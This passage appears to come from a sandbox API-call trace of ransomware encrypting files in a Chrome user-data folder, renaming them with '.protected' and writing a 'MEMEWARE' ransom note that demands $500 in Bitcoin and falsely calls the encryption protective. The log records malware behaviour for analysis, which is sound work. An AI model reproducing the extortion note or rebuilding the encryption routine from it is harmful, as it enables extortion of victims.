HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Web Data" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\web data"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Web Data.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\web data.protected")) returned 1 [0084.432] FindNextFileW (in: hFindFile=0x47bad0, lpFindFileData=0x295e560 | out: lpFindFileData=0x295e560) returned 1 [0084.432] lstrcmpiW (lpString1="Web Data-journal", lpString2="Windows") returned -1 [0084.432] lstrcmpiW (lpString1="Web Data-journal", lpString2="Program Files") returned 1 [0084.432] lstrcmpiW (lpString1="Web Data-journal", lpString2="Program Files (x86)") returned 1 [0084.432] lstrcmpiW (lpString1="Web Data-journal", lpString2="$Recycle.bin") returned 1 [0084.432] lstrcmpiW (lpString1="Web Data-journal", lpString2="System Volume Information") returned 1 [0084.433] wnsprintfW (in: pszDest=0x514c90, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Web Data-journal") returned 96 [0084.433] StrStrIW (lpFirst="Web Data-journal", lpSrch=".protected") returned 0x0 [0084.433] lstrcmpW (lpString1="Web Data-journal", lpString2="RESTORE_FILES.txt") returned 1 [0084.433] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e4fc | out: pbBuffer=0x295e4fc) returned 1 [0084.433] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295e524*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295e524*=0x30) returned 1 [0084.433] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Web Data-journal" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\web data-journal"), 
dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x154 [0084.433] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Web Data-journal") returned 96 [0084.433] StrStrW (lpFirst="Web Data-journal", lpSrch=".txt") returned 0x0 [0084.433] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Web Data-journal") returned 96 [0084.433] StrStrW (lpFirst="Web Data-journal", lpSrch=".rar") returned 0x0 [0084.433] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Web Data-journal") returned 96 [0084.433] StrStrW (lpFirst="Web Data-journal", lpSrch=".zip") returned 0x0 [0084.433] ReadFile (in: hFile=0x154, lpBuffer=0x4a1458, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295e544, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesRead=0x295e544*=0x0, lpOverlapped=0x0) returned 1 [0084.434] SetFilePointerEx (in: hFile=0x154, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0084.434] WriteFile (in: hFile=0x154, lpBuffer=0x4a1458*, nNumberOfBytesToWrite=0x0, lpNumberOfBytesWritten=0x295e544, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesWritten=0x295e544*=0x0, lpOverlapped=0x0) returned 1 [0084.434] SetFilePointerEx (in: hFile=0x154, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0084.434] WriteFile (in: hFile=0x154, lpBuffer=0x295e51c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295e544, lpOverlapped=0x0 | out: lpBuffer=0x295e51c*, lpNumberOfBytesWritten=0x295e544*=0x4, lpOverlapped=0x0) returned 1 [0084.435] WriteFile (in: hFile=0x154, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295e544, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, 
lpNumberOfBytesWritten=0x295e544*=0x30, lpOverlapped=0x0) returned 1 [0084.435] CloseHandle (hObject=0x154) returned 1 [0084.436] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Web Data-journal.protected") returned 106 [0084.436] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Web Data-journal" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\web data-journal"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Web Data-journal.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\web data-journal.protected")) returned 1 [0084.437] FindNextFileW (in: hFindFile=0x47bad0, lpFindFileData=0x295e560 | out: lpFindFileData=0x295e560) returned 0 [0084.437] FindClose (in: hFindFile=0x47bad0 | out: hFindFile=0x47bad0) returned 1 [0084.438] wnsprintfW (in: pszDest=0x514c90, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\RESTORE_FILES.txt") returned 97 [0084.438] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x150 [0084.438] lstrlenA (lpString="! 
SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0084.439] WriteFile (in: hFile=0x150, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295e544, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295e544*=0x53d, lpOverlapped=0x0) returned 1 [0084.439] lstrlenA (lpString="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") returned 684 [0084.439] WriteFile (in: hFile=0x150, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295e544, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295e544*=0x2ac, lpOverlapped=0x0) returned 1 
[0084.439] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0084.439] WriteFile (in: hFile=0x150, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295e544, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295e544*=0xb1, lpOverlapped=0x0) returned 1 [0084.440] CloseHandle (hObject=0x150) returned 1 [0084.441] FindNextFileW (in: hFindFile=0x47ba90, lpFindFileData=0x295e7d0 | out: lpFindFileData=0x295e7d0) returned 1 [0084.441] lstrcmpiW (lpString1="EVWhitelist", lpString2="Windows") returned -1 [0084.441] lstrcmpiW (lpString1="EVWhitelist", lpString2="Program Files") returned -1 [0084.441] lstrcmpiW (lpString1="EVWhitelist", lpString2="Program Files (x86)") returned -1 [0084.441] lstrcmpiW (lpString1="EVWhitelist", lpString2="$Recycle.bin") returned 1 [0084.441] lstrcmpiW (lpString1="EVWhitelist", lpString2="System Volume Information") returned -1 [0084.441] wnsprintfW (in: pszDest=0x504c48, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\EVWhitelist") returned 83 [0084.441] lstrcmpW (lpString1="EVWhitelist", lpString2=".") returned 1 [0084.441] lstrcmpW (lpString1="EVWhitelist", lpString2="..") returned 1 [0084.441] wnsprintfW (in: pszDest=0x514c90, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\EVWhitelist\\*") returned 85 [0084.441] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\EVWhitelist\\*", lpFindFileData=0x295e560 | out: lpFindFileData=0x295e560) returned 0x47bad0 [0084.442] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0084.442] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0084.442] 
lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0084.442] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0084.442] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0084.442] wnsprintfW (in: pszDest=0x514c90, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\EVWhitelist\\.") returned 85 [0084.442] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0084.442] FindNextFileW (in: hFindFile=0x47bad0, lpFindFileData=0x295e560 | out: lpFindFileData=0x295e560) returned 1 [0084.442] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0084.442] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0084.442] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0084.442] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0084.442] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0084.442] wnsprintfW (in: pszDest=0x514c90, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\EVWhitelist\\..") returned 86 [0084.442] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0084.442] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0084.442] FindNextFileW (in: hFindFile=0x47bad0, lpFindFileData=0x295e560 | out: lpFindFileData=0x295e560) returned 0 [0084.442] FindClose (in: hFindFile=0x47bad0 | out: hFindFile=0x47bad0) returned 1 [0084.443] wnsprintfW (in: pszDest=0x514c90, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\EVWhitelist\\RESTORE_FILES.txt") returned 101 [0084.443] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\EVWhitelist\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js 
halpmcxz\\appdata\\local\\google\\chrome\\user data\\evwhitelist\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x150 [0084.444] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0084.444] WriteFile (in: hFile=0x150, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295e544, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295e544*=0x53d, lpOverlapped=0x0) returned 1 [0084.445] lstrlenA 
(lpString="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") returned 684 [0084.445] WriteFile (in: hFile=0x150, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295e544, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295e544*=0x2ac, lpOverlapped=0x0) returned 1 [0084.445] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0084.445] WriteFile (in: hFile=0x150, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295e544, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295e544*=0xb1, lpOverlapped=0x0) returned 1 [0084.445] CloseHandle (hObject=0x150) returned 1 [0084.445] FindNextFileW (in: hFindFile=0x47ba90, lpFindFileData=0x295e7d0 | out: lpFindFileData=0x295e7d0) returned 1 [0084.445] lstrcmpiW (lpString1="FileTypePolicies", lpString2="Windows") returned -1 [0084.445] lstrcmpiW (lpString1="FileTypePolicies", lpString2="Program Files") returned -1 [0084.445] lstrcmpiW (lpString1="FileTypePolicies", lpString2="Program Files (x86)") returned -1 [0084.445] lstrcmpiW (lpString1="FileTypePolicies", lpString2="$Recycle.bin") returned 1 [0084.445] lstrcmpiW (lpString1="FileTypePolicies", lpString2="System Volume Information") returned -1 [0084.445] wnsprintfW (in: pszDest=0x504c48, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\FileTypePolicies") returned 88 [0084.445] lstrcmpW (lpString1="FileTypePolicies", lpString2=".") returned 1 [0084.445] lstrcmpW (lpString1="FileTypePolicies", lpString2="..") returned 1 [0084.445] wnsprintfW (in: pszDest=0x514c90, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\FileTypePolicies\\*") returned 90 [0084.445] 
FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\FileTypePolicies\\*", lpFindFileData=0x295e560 | out: lpFindFileData=0x295e560) returned 0x47bad0 [0084.445] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0084.445] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0084.445] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0084.445] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0084.446] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0084.446] wnsprintfW (in: pszDest=0x514c90, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\FileTypePolicies\\.") returned 90 [0084.446] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0084.446] FindNextFileW (in: hFindFile=0x47bad0, lpFindFileData=0x295e560 | out: lpFindFileData=0x295e560) returned 1 [0084.446] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0084.446] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0084.446] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0084.446] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0084.446] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0084.446] wnsprintfW (in: pszDest=0x514c90, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\FileTypePolicies\\..") returned 91 [0084.446] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0084.446] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0084.446] FindNextFileW (in: hFindFile=0x47bad0, lpFindFileData=0x295e560 | out: lpFindFileData=0x295e560) returned 0 [0084.446] FindClose (in: hFindFile=0x47bad0 | out: hFindFile=0x47bad0) returned 1 [0084.446] wnsprintfW (in: pszDest=0x514c90, cchDest=32767, 
pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\FileTypePolicies\\RESTORE_FILES.txt") returned 106 [0084.446] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\FileTypePolicies\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\filetypepolicies\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x150 [0084.447] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. 
\r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0084.447] WriteFile (in: hFile=0x150, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295e544, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295e544*=0x53d, lpOverlapped=0x0) returned 1 [0084.447] lstrlenA (lpString="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") returned 684 [0084.447] WriteFile (in: hFile=0x150, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295e544, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295e544*=0x2ac, lpOverlapped=0x0) returned 1 [0084.447] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0084.448] WriteFile (in: hFile=0x150, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295e544, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295e544*=0xb1, 
lpOverlapped=0x0) returned 1 [0084.448] CloseHandle (hObject=0x150) returned 1 [0084.448] FindNextFileW (in: hFindFile=0x47ba90, lpFindFileData=0x295e7d0 | out: lpFindFileData=0x295e7d0) returned 1 [0084.448] lstrcmpiW (lpString1="First Run", lpString2="Windows") returned -1 [0084.448] lstrcmpiW (lpString1="First Run", lpString2="Program Files") returned -1 [0084.448] lstrcmpiW (lpString1="First Run", lpString2="Program Files (x86)") returned -1 [0084.448] lstrcmpiW (lpString1="First Run", lpString2="$Recycle.bin") returned 1 [0084.448] lstrcmpiW (lpString1="First Run", lpString2="System Volume Information") returned -1 [0084.448] wnsprintfW (in: pszDest=0x504c48, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\First Run") returned 81 [0084.448] StrStrIW (lpFirst="First Run", lpSrch=".protected") returned 0x0 [0084.448] lstrcmpW (lpString1="First Run", lpString2="RESTORE_FILES.txt") returned -1 [0084.448] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e76c | out: pbBuffer=0x295e76c) returned 1 [0084.448] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295e794*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295e794*=0x30) returned 1 [0084.448] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\First Run" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\first run"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x150 [0084.448] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\First Run") returned 81 [0084.448] StrStrW (lpFirst="First Run", lpSrch=".txt") returned 0x0 [0084.448] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS 
HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\First Run") returned 81 [0084.448] StrStrW (lpFirst="First Run", lpSrch=".rar") returned 0x0 [0084.448] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\First Run") returned 81 [0084.448] StrStrW (lpFirst="First Run", lpSrch=".zip") returned 0x0 [0084.449] ReadFile (in: hFile=0x150, lpBuffer=0x4a1458, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesRead=0x295e7b4*=0x0, lpOverlapped=0x0) returned 1 [0084.449] SetFilePointerEx (in: hFile=0x150, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0084.449] WriteFile (in: hFile=0x150, lpBuffer=0x4a1458*, nNumberOfBytesToWrite=0x0, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesWritten=0x295e7b4*=0x0, lpOverlapped=0x0) returned 1 [0084.449] SetFilePointerEx (in: hFile=0x150, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0084.449] WriteFile (in: hFile=0x150, lpBuffer=0x295e78c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x295e78c*, lpNumberOfBytesWritten=0x295e7b4*=0x4, lpOverlapped=0x0) returned 1 [0084.450] WriteFile (in: hFile=0x150, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295e7b4*=0x30, lpOverlapped=0x0) returned 1 [0084.450] CloseHandle (hObject=0x150) returned 1 [0084.450] wnsprintfW (in: pszDest=0x514c90, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\First Run.protected") returned 91 [0084.450] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\First Run" (normalized: 
"c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\first run"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\First Run.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\first run.protected")) returned 1 [0084.450] FindNextFileW (in: hFindFile=0x47ba90, lpFindFileData=0x295e7d0 | out: lpFindFileData=0x295e7d0) returned 1 [0084.450] lstrcmpiW (lpString1="Local State", lpString2="Windows") returned -1 [0084.451] lstrcmpiW (lpString1="Local State", lpString2="Program Files") returned -1 [0084.451] lstrcmpiW (lpString1="Local State", lpString2="Program Files (x86)") returned -1 [0084.451] lstrcmpiW (lpString1="Local State", lpString2="$Recycle.bin") returned 1 [0084.451] lstrcmpiW (lpString1="Local State", lpString2="System Volume Information") returned -1 [0084.451] wnsprintfW (in: pszDest=0x504c48, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Local State") returned 83 [0084.451] StrStrIW (lpFirst="Local State", lpSrch=".protected") returned 0x0 [0084.451] lstrcmpW (lpString1="Local State", lpString2="RESTORE_FILES.txt") returned -1 [0084.451] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e76c | out: pbBuffer=0x295e76c) returned 1 [0084.451] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295e794*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295e794*=0x30) returned 1 [0084.451] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Local State" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\local state"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x150 [0084.451] lstrlenW 
